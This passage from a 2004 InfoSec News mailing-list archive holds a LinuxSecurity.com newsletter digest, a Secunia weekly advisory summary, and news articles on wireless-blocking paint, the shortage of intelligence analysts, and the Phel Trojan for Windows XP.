points of view. http://www.linuxsecurity.com/content/view/117515/49/ ----- Open Letter to the Linux Security Community With an all new look & feel, organizational changes, security events, and additions to our staff, we hope to better serve the Linux and open source community. Although there are many aesthetic improvements, a major part of our development has focused on creating a content structure and backend system that is easy to update. http://www.linuxsecurity.com/content/view/117288/49/ ------ >> The Perfect Productivity Tools << WebMail, Groupware and LDAP Integration provide organizations with the ability to securely access corporate email from any computer, collaborate with co-workers and set-up comprehensive addressbooks to consistently keep employees organized and connected. http://ads.linuxsecurity.com/cgi-bin/newad_redirect.pl?id=gdn05 --> Take advantage of the LinuxSecurity.com Quick Reference Card! --> http://www.linuxsecurity.com/docs/QuickRefCard.pdf +---------------------+ | Host Security News: | <<-----[ Articles This Week ]---------- +---------------------+ * The Linux Year 24th, December, 2004 Was it because the march on the server space continued at a relentless pace? Because there were big announcements around desktop installments? Because there was finally some realistic perspective about the threat from SCO, or the threat to Microsoft? However you look at it, the penguin's tux has never looked more pristine or ready for business. http://www.linuxsecurity.com/content/view/117669 * Adding strong security from day one 22nd, December, 2004 Adding security to constrained devices is not an easy task for developers who need to accommodate a range of new features without compromising usability. Experience has shown that building security in at the design stage yields better results from a security and performance perspective. http://www.linuxsecurity.com/content/view/117637 * LDAP Server Administration with GOsa 20th, December, 2004 A flaw in two popular Unix and Linux administration consoles could lead to systems being compromised, according to an alert from security firm Secunia. The bug in Usermin, a widely used administration console for Unix and Linux, could allow the introduction of rogue shell code when a user views a particular e-mail via the web. http://www.linuxsecurity.com/content/view/117585 * Special Report: Database Security 24th, December, 2004 Databases control most of the business world's valuable information. Pick a vital application--credit-card processing, EDI, financial analysis, just-in-time production--and you'll find a database under it. http://www.linuxsecurity.com/content/view/117663 * Tools Block Code-Busting Crooks 20th, December, 2004 The concept of adding security to the coding phase of application development is catching on, with new companies delivering tools to help developers test for vulnerabilities early in the process. http://www.linuxsecurity.com/content/view/117600 * Why Your Data Is At Risk 21st, December, 2004 Your data is vulnerable no matter where it resides. While most companies take security precautions, many of those precautions turn out to be insufficient to protect valuable corporate assets. The key lies in knowing where vulnerabilities exist and making appropriate risk-based decisions. http://www.linuxsecurity.com/content/view/117613 * Security Starts from the Inside Out 21st, December, 2004 Patrick Angle, 34, was charged with intentionally damaging a protected computer. The charge alleged that Angle, who had worked for Varian, had become disgruntled with his employment by September 2003 and had been told by the company that his employment contract would be terminated in October of that same year. http://www.linuxsecurity.com/content/view/117615 * How ITIL Can Improve Information Security 24th, December, 2004 ITIL - the Information Technology Infrastructure Library - is a set of best practices and guidelines that define an integrated, process-based approach for managing information technology services. ITIL can be applied across almost every type of IT environment. http://www.linuxsecurity.com/content/view/117666 * Linux in Government: Security Enhanced Linux - The Future is Now 20th, December, 2004 If a must-have, must-know innovation exists for Linux's future viability, you might place all bets on Security Enhanced Linux. Vastly misunderstood and underrated, SELinux provides a marketing differentiator that could carry Linux deep into infrastructures that so far have shown lukewarm acceptance of the open-source operating system. http://www.linuxsecurity.com/content/view/117586 +------------------------+ | Network Security News: | +------------------------+ * Survivor's Guide to 2005: Security 20th, December, 2004 Intrusion detection systems--the primary source of warnings that attacks are under way--are critical pieces of network-security infrastructure, providing detailed records of attacks, intrusions and unexpected network activity. For most enterprises, the IDS has become the central piece of security hardware, certainly the most visible piece to the staff. Without an IDS, the security staff must gather forensics information from firewall, server and router log files. http://www.linuxsecurity.com/content/view/117587 * Linux lasting longer against Net attacks 24th, December, 2004 Unpatched Linux systems are surviving longer on the Internet before being compromised, according to a report from the Honeynet Project released this week. The data, from a dozen networks, showed that the average Linux system lasts three months before being compromised, a significant increase from the 72 hours life span of a Linux system in 2001. http://www.linuxsecurity.com/content/view/117668 * Will 2005 Bring a Safer Internet? 24th, December, 2004 Sometimes writing about security is just too easy. Making predictions about next year is like this in some ways. Let's pick some of the low-hanging fruit early. Even though most spam-tracking companies show that spam already comprises 75 percent or more of all e-mail, that proportion will go up in 2005. http://www.linuxsecurity.com/content/view/117671 * Linux holds out against attackers 24th, December, 2004 A recent 'honeynet' experiment showed that unpatched Linux systems held up for an average of three months before succumbing to Internet-based attacks. http://www.linuxsecurity.com/content/view/117662 * Know Your Enemy: Trends 22nd, December, 2004 This paper documents how the life expectancy of unpatched or vulnerable deployments of common Linux systems has increased from 3 days to 3 months. This is surprising based on the increase of malicious activity seen in the past 18 months. http://www.linuxsecurity.com/content/view/117617 +------------------------+ | General Security News: | +------------------------+ * GPL to get a makeover 23rd, December, 2004 The General Public License hasn't had a proper update for 13 years, and it's starting to show its age. It looks set to be updated though, to ensure it's more in tune with today's software models and potential legal battles. http://www.linuxsecurity.com/content/view/117654 * NASA hacker jailed for six months 20th, December, 2004 A US man has been jailed for six months for a 2001 attack on the web systems of space agency NASA which cost $200,000 to fix. http://www.linuxsecurity.com/content/view/117588 Groups fight Internet wiretap push 24th, December, 2004 Companies and advocacy groups opposed to the FBI's plan to make the Internet more accommodating to covert law enforcement surveillance are sharpening a new argument against the controversial proposal: that law enforcement's Internet spying capabilities are just fine as it is. http://www.linuxsecurity.com/content/view/117665 * Army focuses on cyber protection 24th, December, 2004 A recently issued Army white paper, "Fight the Network," provides a new framework for the Signal Regiment, the service's communications organization, as it changes to support lighter, more mobile warfighting units. http://www.linuxsecurity.com/content/view/117670 * Banks test ID device for online security 24th, December, 2004 For years, banks gave away toasters to people who opened checking accounts; soon they may be distributing a more modern kind of appliance. Responding to an increase in Internet fraud, some banks and brokerage firms plan to begin issuing small devices that would help their customers prove their identities when they log on to online banking, brokerage and bill-payment programs. http://www.linuxsecurity.com/content/view/117673 ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------ From isn at c4i.org Wed Dec 29 01:38:08 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 29 01:51:39 2004 Subject: [ISN] Holiday Break! Message-ID: If you haven't noticed, I've been taking a little break from sending out InfoSec News. I figured with ALL the vacation bouncebacks with everyone on holiday break, I should take a little one too. :) I might post one more batch before the end of the year, but at least for those of you working the New Years watch, you'll have a little something to read before Regis drops the ball. Cheers! William Knowles wk@c4i.org *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC ---------------------------------------------------------------- C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* From isn at c4i.org Fri Dec 31 05:28:36 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 31 05:44:21 2004 Subject: [ISN] Startup Markets Wireless - Security Paint Message-ID: http://informationweek.com/story/showArticle.jhtml?articleID=56200676 By Jim Nash Dec. 28, 2004 A small startup in Silicon Valley has an anti-intrusion tool that sells for $69 a gallon--you supply the brush. Force Field Wireless makes three products that it says can dramatically reduce the leakage of wireless signals from a room or building. The company's sales manager, Harold Wray, co-developed DefendAir Radio Shield latex paint, which contains copper filings and an aluminum compound. When spread evenly on a wall, the paint reflects signals in frequencies from 100 MHz to 5 GHz. Paint four walls, a floor, and a ceiling, and you effectively have a Faraday cage, which is a specially constructed metal room that blocks all radio signals in or out, suitable for a CIA director or a determined shut-in. "It was my concept along with my colleague, Diane Lopez," says Wray, a former network engineer with Networks Associates. "We knew of people inundated with interference on their wireless systems. In fact, Diane, in her apartment, could find eight wireless networks around her. She needed to shield herself." Pete Lindstrom, research director at Spire Security, says the idea is intriguing. It's for people who have a "mid- to high level of comfort with wireless," Lindstrom says. "The really security conscious are going to ban wireless altogether." DefendAir is nontoxic, contains no lead, and meets all U.S. Environmental Protection Agency standards, Wray says. Besides the paint, Force Field sells 32 ounces of a copper/aluminum powder that homeowners can add to their own paint for $34. The company also makes a window film that cuts down on signal leakage: A 30-inch-by-25-foot roll is priced at $45. "This wouldn't be the first thing I'd do to secure a network," says Spire Security's Lindstrom. "But in a crowded environment, in an office complex, it might be a thing to do." It's better to implement a solid authentication/encryption system, he says. Force Field's Wray says sales are going well. A paint manufacturer delivers 100 gallons once every two months or so, and the paint was sold out last quarter. Businesses make up the bulk of Force Field's customers, but Wray is pushing hard to win over consumers and looking at government sales, too. "Businesses--particularly commercial real-estate developers--see an immediate need for it," he says. Indeed, 71% of those responding to InformationWeek Research's Outlook report for the fourth quarter of '04 say they plan to implement network-security-management apps. Sixty percent say they plan to deploy intrusion-detection software, and 42% plan to fire up wireless IP-based apps. "Consider [radio-frequency identification], where not only are we talking about wireless networking but the whole value of RFID is the message emanating from the tags," says Lindstrom. DefendAir would be an attractive option to protect an RFID-enabled warehouse, he says. There are drawbacks to the paint. It doesn't just block wireless networks. In the home, it would block the one or two remaining TVs connected to rabbit ears. More important, it blocks mobile-phone signals. Wray suggests that businesses either paint only critical parts of buildings or introduce wireless callers to the smokers huddled around the front door. Convincing consumers to take wireless security seriously has been harder. "They see it like tinfoil on your head," Wray says. "They think it's kind of paranoid." Force Field has been trying to interest the Department of Homeland Security, but discussions are ongoing, Wray says. "Ironically, we have had foreign governments contact us--from the Middle East. Kind of scary." Wray says he won't sell to them. From isn at c4i.org Fri Dec 31 05:29:26 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 31 05:44:24 2004 Subject: [ISN] Secunia Weekly Summary - Issue: 2004-53 Message-ID: ======================================================================== The Secunia Weekly Advisory Summary 2004-12-23 - 2004-12-30 This week : 43 advisories ======================================================================== Table of Contents: 1.....................................................Word From Secunia 2....................................................This Week In Brief 3...............................This Weeks Top Ten Most Read Advisories 4.......................................Vulnerabilities Summary Listing 5.......................................Vulnerabilities Content Listing ======================================================================== 1) Word From Secunia: Monitor, Filter, and Manage Security Information - Filtering and Management of Secunia advisories - Overview, documentation, and detailed reports - Alerting via email and SMS Request Trial: https://ca.secunia.com/?f=s ======================================================================== 2) This Week in Brief: ADVISORIES: Almost every single branch of the Microsoft Windows operating system is vulnerable to several new vulnerabilities. The vulnerabilities can be exploited to either cause a denial of service or compromise a vulnerable system. Currently, no vendor solution is available for these vulnerabilities. Please read referenced Secunia advisory for details. References: http://secunia.com/SA13645/ -- A vulnerability has been reported in SHOUTcast, which potentially can be exploited by malicious people to compromise a vulnerability system. The vendor has released an updated version, which corrects this vulnerability. References: http://secunia.com/SA13661/ VIRUS ALERTS: Secunia has not issued any virus alerts during the week. ======================================================================== 3) This Weeks Top Ten Most Read Advisories: 1. [SA13482] Internet Explorer DHTML Edit ActiveX Control Cross-Site Scripting 2. [SA13645] Microsoft Windows Multiple Vulnerabilities 3. [SA12889] Microsoft Internet Explorer Multiple Vulnerabilities 4. [SA13129] Mozilla / Mozilla Firefox Window Injection Vulnerability 5. [SA13239] phpBB Multiple Vulnerabilities 6. [SA13251] Microsoft Internet Explorer Window Injection Vulnerability 7. [SA13481] PHP Multiple Vulnerabilities 8. [SA12959] Internet Explorer HTML Elements Buffer Overflow Vulnerability 9. [SA13578] Windows Media Player ActiveX Control Two Vulnerabilities 10. [SA13471] Adobe Reader / Adobe Acrobat Multiple Vulnerabilities ======================================================================== 4) Vulnerabilities Summary Listing Windows: [SA13647] WPKontakt Email Script Insertion Vulnerability UNIX/Linux: [SA13692] Mandrake update for koffice [SA13691] Mandrake update for kdegraphics [SA13689] Mandrake update for gpdf [SA13686] Mandrake update for tetex [SA13685] Mandrake update for xpdf [SA13667] Debian update for imlib [SA13666] Debian update for tiff [SA13663] Debian update for netkit-telnet-ssl [SA13656] SSLtelnet Unspecified Format String Vulnerability [SA13646] Fedora update for xpdf [SA13690] Mandrake update for cups [SA13683] Gentoo update for ViewCVS [SA13669] Fedora update for cups [SA13668] CUPS xpdf "doImage()" Buffer Overflow Vulnerability [SA13664] Snort TCP/IP Options Denial of Service Vulnerability [SA13658] Red Hat update for SquirrelMail [SA13672] Gentoo update for cups [SA13662] Mandrake update for samba [SA13653] Netscape Directory Server for HP-UX Buffer Overflow Vulnerability [SA13696] KDE kio_ftp FTP Command Injection Vulnerability [SA13688] Mandrake update for kdelibs [SA13651] HP Secure Web Server Denial of Service Vulnerability [SA13648] HP Tru64 TCP Connection Reset Denial of Service [SA13659] Red Hat update for kernel [SA13684] Mandrake update for glibc [SA13682] Conectiva update for netpbm [SA13679] aStats Insecure Temporary File Creation [SA13670] Atari800 Unspecified Buffer Overflow Vulnerabilities [SA13655] HP-UX SAM Privilege Escalation Vulnerability [SA13654] Linux Kernel SACF Instruction Privilege Escalation Vulnerability [SA13650] Linux Security Modules Running Processes Capability Security Issue Other: [SA13671] Symantec Nexland Firewall Appliances Three Vulnerabilities Cross Platform: [SA13687] Mozilla "MSG_UnEscapeSearchUrl()" Buffer Overflow Vulnerability [SA13673] WHM AutoPilot Multiple Vulnerabilities [SA13661] SHOUTcast Filename Format String Vulnerability [SA13660] PHProjekt "path_pre" Parameter Arbitrary File Inclusion Vulnerability [SA13657] e107 Image Manager File Upload Vulnerability [SA13652] Help Center Live Multiple Vulnerabilities [SA13649] Zeroboard Two Vulnerabilities [SA13677] MySQL Eventum Multiple Vulnerabilities [SA13665] PHP-Blogger Disclosure of Sensitive Information Security Issue [SA13694] Moodle "search" Cross-Site Scripting Vulnerability ======================================================================== 5) Vulnerabilities Content Listing Windows:-- [SA13647] WPKontakt Email Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-24 A vulnerability has been reported in WPKontakt, allowing malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/13647/ UNIX/Linux:-- [SA13692] Mandrake update for koffice Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-30 MandrakeSoft has issued an update for koffice. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13692/ -- [SA13691] Mandrake update for kdegraphics Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-30 MandrakeSoft has issued an update for kdegraphics. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13691/ -- [SA13689] Mandrake update for gpdf Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-30 MandrakeSoft has issued updates for gpdf. These fix a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13689/ -- [SA13686] Mandrake update for tetex Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-30 MandrakeSoft has issued an update for tetex. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13686/ -- [SA13685] Mandrake update for xpdf Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-30 MandrakeSoft has issued an update for xpdf. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13685/ -- [SA13667] Debian update for imlib Critical: Highly critical Where: From remote Impact: System access, DoS Released: 2004-12-25 Debian has issued an update for imlib. This fixes multiple vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13667/ -- [SA13666] Debian update for tiff Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-25 Debian has issued an update for tiff. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13666/ -- [SA13663] Debian update for netkit-telnet-ssl Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-24 Debian has issued an update for netkit-telnet-ssl. This fixes a vulnerability, which potentially allows malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13663/ -- [SA13656] SSLtelnet Unspecified Format String Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-24 Joel Eriksson has reported a vulnerability in SSLtelnet, which potentially allows malicious people to compromise a vulnerable system Full Advisory: http://secunia.com/advisories/13656/ -- [SA13646] Fedora update for xpdf Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-25 Fedora has issued an update for xpdf. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13646/ -- [SA13690] Mandrake update for cups Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-30 MandrakeSoft has issued an update for cups. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13690/ -- [SA13683] Gentoo update for ViewCVS Critical: Moderately critical Where: From remote Impact: Security Bypass, Cross Site Scripting Released: 2004-12-29 Gentooo has issued an update for ViewCVS. This fixes two vulnerabilities, which can be exploited by malicious users to bypass certain security restrictions and conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13683/ -- [SA13669] Fedora update for cups Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-26 Fedora has issued an update for cups. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13669/ -- [SA13668] CUPS xpdf "doImage()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-26 A vulnerability has been reported in CUPS, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13668/ -- [SA13664] Snort TCP/IP Options Denial of Service Vulnerability Critical: Moderately critical Where: From remote Impact: DoS Released: 2004-12-24 Marcin Zgorecki has reported a vulnerability in Snort, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13664/ -- [SA13658] Red Hat update for SquirrelMail Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-24 Red Hat has issued an update for SquirrelMail. This fixes a vulnerability, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/13658/ -- [SA13672] Gentoo update for cups Critical: Moderately critical Where: From local network Impact: Manipulation of data, DoS, System access Released: 2004-12-28 Gentoo has issued an update for cups. This fixes multiple vulnerabilities, which can be exploited by malicious users to manipulate certain files, cause a DoS (Denial of Service), or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13672/ -- [SA13662] Mandrake update for samba Critical: Moderately critical Where: From local network Impact: System access Released: 2004-12-28 MandrakeSoft has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13662/ -- [SA13653] Netscape Directory Server for HP-UX Buffer Overflow Vulnerability Critical: Moderately critical Where: From local network Impact: DoS, System access Released: 2004-12-24 A vulnerability has been reported in Netscape Directory Server for HP-UX, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13653/ -- [SA13696] KDE kio_ftp FTP Command Injection Vulnerability Critical: Less critical Where: From remote Impact: Manipulation of data Released: 2004-12-30 The vendor has acknowledged a vulnerability in kio_ftp, which can be exploited by malicious people to conduct FTP command injection attacks. Full Advisory: http://secunia.com/advisories/13696/ -- [SA13688] Mandrake update for kdelibs Critical: Less critical Where: From remote Impact: Manipulation of data Released: 2004-12-30 MandrakeSoft has issued an update for kdelibs. This fixes a vulnerability, which can be exploited by malicious people to conduct FTP command injection attacks. Full Advisory: http://secunia.com/advisories/13688/ -- [SA13651] HP Secure Web Server Denial of Service Vulnerability Critical: Less critical Where: From remote Impact: DoS Released: 2004-12-24 HP has acknowledged a vulnerability in Secure Web Server, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13651/ -- [SA13648] HP Tru64 TCP Connection Reset Denial of Service Critical: Less critical Where: From remote Impact: DoS Released: 2004-12-24 HP has acknowledged a vulnerability in Tru64 UNIX, which can be exploited by malicious people to reset established TCP connections on a vulnerable system. Full Advisory: http://secunia.com/advisories/13648/ -- [SA13659] Red Hat update for kernel Critical: Less critical Where: From local network Impact: Exposure of system information, Exposure of sensitive information, Privilege escalation, DoS Released: 2004-12-24 Red Hat has issued updated packages for the kernel. These fixes some vulnerabilities, allowing malicious, local users to escalate their privileges, cause a DoS (Denial of Service), and gain knowledge of sensitive information or malicious people to cause a DoS. Full Advisory: http://secunia.com/advisories/13659/ -- [SA13684] Mandrake update for glibc Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-30 MandrakeSoft has issued an update for glibc. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13684/ -- [SA13682] Conectiva update for netpbm Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-30 Conectiva has issued an update for netpbm. This fixes a vulnerability, which can be exploited by malicious, local users to escalate their privileges on a vulnerable system. Full Advisory: http://secunia.com/advisories/13682/ -- [SA13679] aStats Insecure Temporary File Creation Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-29 Javier Fern?ndez-Sanguino Pe?a has reported a vulnerability in aStats, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13679/ -- [SA13670] Atari800 Unspecified Buffer Overflow Vulnerabilities Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-28 Some vulnerabilities have been reported in Atari800, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/13670/ -- [SA13655] HP-UX SAM Privilege Escalation Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-24 A vulnerability has been reported in HP-UX, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/13655/ -- [SA13654] Linux Kernel SACF Instruction Privilege Escalation Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-27 Martin Schwidefsky has reported a vulnerability in the Linux Kernel, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/13654/ -- [SA13650] Linux Security Modules Running Processes Capability Security Issue Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-27 LiangBin has reported a security issue in Linux Security Modules (LSM), which may grant normal user processes escalated privileges. Full Advisory: http://secunia.com/advisories/13650/ Other:-- [SA13671] Symantec Nexland Firewall Appliances Three Vulnerabilities Critical: Highly critical Where: From remote Impact: Security Bypass, Manipulation of data, DoS Released: 2004-12-30 Symantec has acknowledged three vulnerabilities in the Nexland Firewall Appliances, which can be exploited by malicious people to cause a DoS (Denial of Service), identify active services, and manipulate the firewall configuration. Full Advisory: http://secunia.com/advisories/13671/ Cross Platform:-- [SA13687] Mozilla "MSG_UnEscapeSearchUrl()" Buffer Overflow Vulnerability Critical: Highly critical Where: From remote Impact: System access, DoS Released: 2004-12-30 Maurycy Prodeus has reported a vulnerability in Mozilla, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13687/ -- [SA13673] WHM AutoPilot Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Cross Site Scripting, Exposure of system information, System access Released: 2004-12-29 James Bercegay has reported some vulnerabilities in WHM AutoPilot, which can be exploited by malicious people to conduct cross-site scripting, compromise a vulnerable system and disclose system information. Full Advisory: http://secunia.com/advisories/13673/ -- [SA13661] SHOUTcast Filename Format String Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-26 Tomasz Trojanowski and Damian Put have discovered a vulnerability in SHOUTcast, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13661/ -- [SA13660] PHProjekt "path_pre" Parameter Arbitrary File Inclusion Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-28 cYon has reported a vulnerability in PHProjekt, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13660/ -- [SA13657] e107 Image Manager File Upload Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-26 sysbug has reported a vulnerability in e107, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13657/ -- [SA13652] Help Center Live Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Cross Site Scripting, Exposure of sensitive information, System access Released: 2004-12-26 James Bercegay has reported some vulnerabilities in Help Center Live, which can be exploited by malicious people to conduct cross-site scripting attacks, compromise a vulnerable system and disclose sensitive information. Full Advisory: http://secunia.com/advisories/13652/ -- [SA13649] Zeroboard Two Vulnerabilities Critical: Highly critical Where: From remote Impact: Cross Site Scripting, System access Released: 2004-12-24 Jeremy Bae has reported two vulnerabilities in Zeroboard, which can be exploited by malicious people to compromise a vulnerable system and conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13649/ -- [SA13677] MySQL Eventum Multiple Vulnerabilities Critical: Moderately critical Where: From remote Impact: Security Bypass, Cross Site Scripting Released: 2004-12-30 sullo has reported multiple vulnerabilities in Eventum, which can be exploited by malicious people to conduct cross-site scripting and script insertion attacks and potentially bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/13677/ -- [SA13665] PHP-Blogger Disclosure of Sensitive Information Security Issue Critical: Moderately critical Where: From remote Impact: Exposure of sensitive information Released: 2004-12-24 snilabs has reported a security issue in PHP-Blogger, which can be exploited by malicious people to disclose sensitive information. Full Advisory: http://secunia.com/advisories/13665/ -- [SA13694] Moodle "search" Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-30 Bartek Nowotarski has reported a vulnerability in Moodle, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13694/ ======================================================================== Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Subscribe: http://secunia.com/secunia_weekly_summary/ Contact details: Web : http://secunia.com/ E-mail : support@secunia.com Tel : +45 70 20 51 44 Fax : +45 70 20 51 45 ======================================================================== From isn at c4i.org Fri Dec 31 05:29:50 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 31 05:44:25 2004 Subject: [ISN] Analysts Are in Great Demand Message-ID: http://www.washingtonpost.com/wp-dyn/articles/A35070-2004Dec29.html By Katherine Pfleger Shrader Associated Press December 30, 2004 Counterterrorism agencies are shopping for talent at job fairs, dangling generous scholarships and luring staff from each other in a race to overcome a shortage of analysts that may only get worse in the new intelligence reorganization. The problem existed even before Congress and the White House approved an intelligence restructuring this month that has created positions for people whose skills are already in high demand. There is no consensus among the nation's 15 intelligence agencies on where staffing needs are the most acute. But few dispute that many more analysts are needed, particularly in the departments and agencies created since Sept. 11, 2001. The nearly two-year-old Department of Homeland Security is a prime example. "If you had a hundred, we'd take them," retired Army Lt. Gen. Patrick M. Hughes, the agency's top intelligence official, said in an interview earlier this year. "We have to look, search, test, assess. . . . We need people, but we need good people." To find them, Homeland Security and other agencies are heading to job fairs, often looking near military bases where civil service is part of the culture and people may have security clearances. They are also trying to snag people from the private sector. Congress is also offering sweeteners. Senate Select Committee on Intelligence Chairman Pat Roberts (R-Kan.) created the intelligence community's answer to the GI Bill and other military scholarships. Under the program, undergraduate and graduate students can receive as much as $50,000 for two years of tuition if they agree to take needed jobs in an intelligence agency for as long as three years. This year, slots for 150 students were divided among the agencies, using $4 million from Congress. About $6 million will be available next year. Being an analyst is almost an academic profession -- part taught, part absorbed, part intuition -- that requires weighing volumes of information and boiling them down into reports for policymakers in the executive branch and in Congress. Among the most classified and most important reports are national intelligence estimates, which draw on information from across government and are written by top analysts at the National Intelligence Council. It was the council that produced the October 2002 estimate on the threat posed by Iraq, with its overblown assessment of weapons stockpiles. Statistics on precisely how many analysts are needed are hard to come by. Almost universally, agencies say such numbers are classified. President Bush ordered the CIA in November to double the number of analysts it employs. The agency would not say how many new jobs that directive opened up. Beginning several years ago, the National Geospatial-Intelligence Agency, which studies imagery from spy satellites and other systems, started hiring about 900 analysts, spokesman Dave Burpee said. Most will join the agency between next year and 2009. In addition, the Defense Intelligence Agency plans to hire 1,000 mid-level to senior civilians next year, mostly analysts, in jobs with starting salaries between $53,000 and $74,000. And the National Security Agency, the nation's code breaker and code protector, hopes to hire more than 6,000 people by 2009, on top of the 1,300 hired by the end of September. The secretive agency would not say how many will be analysts. DIA spokesman Donald Black said there has been more competition to hire analysts since the Sept. 11, 2001, attacks, especially people who speak languages such as Arabic that are needed at the CIA, the FBI and elsewhere. Security clearances narrow the field even more. "You don't have a limitless pool to draw from," Black said. Agencies also hire away analysts from each other. "Sure, there is intense competition within the government," said Homeland Security spokeswoman Michelle Petrovich. "The pool that we are looking for is probably going to be fairly limited and in high demand." During a series of hearings into the bombings of the USS Cole, the U.S. embassies in Africa and other attacks, Roberts concluded that the shortage of experienced analysts was the intelligence community's most glaring deficiency. Before the 1998 attack on the Navy destroyer Cole in a Yemeni port, one intelligence analyst had found information that led him to conclude that such an attack was possible. But the warnings were not heeded, Roberts said. Most specialties require analysts to invest seven to 10 years to get a true handle on their subject. Cultures and languages can require extensive immersion in a region, which cannot be gained from sitting behind a desk in Washington. Mike Scheuer, who headed the CIA's Osama bin Laden unit from 1996 to 1999, said the intelligence services need to find more experts on Islamic extremism, like the legions of analysts available during the Cold War to deal with the Soviets. From isn at c4i.org Fri Dec 31 05:30:12 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 31 05:44:28 2004 Subject: [ISN] Windows XP users Phelled by new Trojan Message-ID: http://www.theregister.co.uk/2004/12/30/ms_phel_vuln/ By Ashlee Vance in Chicago 30th December 2004 A new Trojan horse - named Phel - that punishes users of Microsoft Windows XP operating system is in the wild. Security software firm Symantec has issued a bulletin warning Windows XP users to be on the look out for the program, which is distributed as an .html file. The malicious code can attack systems running XP Service Pack 2. The vuln was first found in October, and Microsoft is busy trying to catch up to it. "Microsoft is taking this vulnerability very seriously, and an update to correct the vulnerability is currently in development," the company told ComputerWorld. "We will release the security update when the development and testing process is complete, and the update is found to effectively correct the vulnerability." Symantec warns that users will see two Internet Explorer windows pop up when an .html file with Trojan.Phel.A is opened. If the code does its worst, the Trojan will automatically be executed every time a Windows user turns on his machine. More information from Symantec 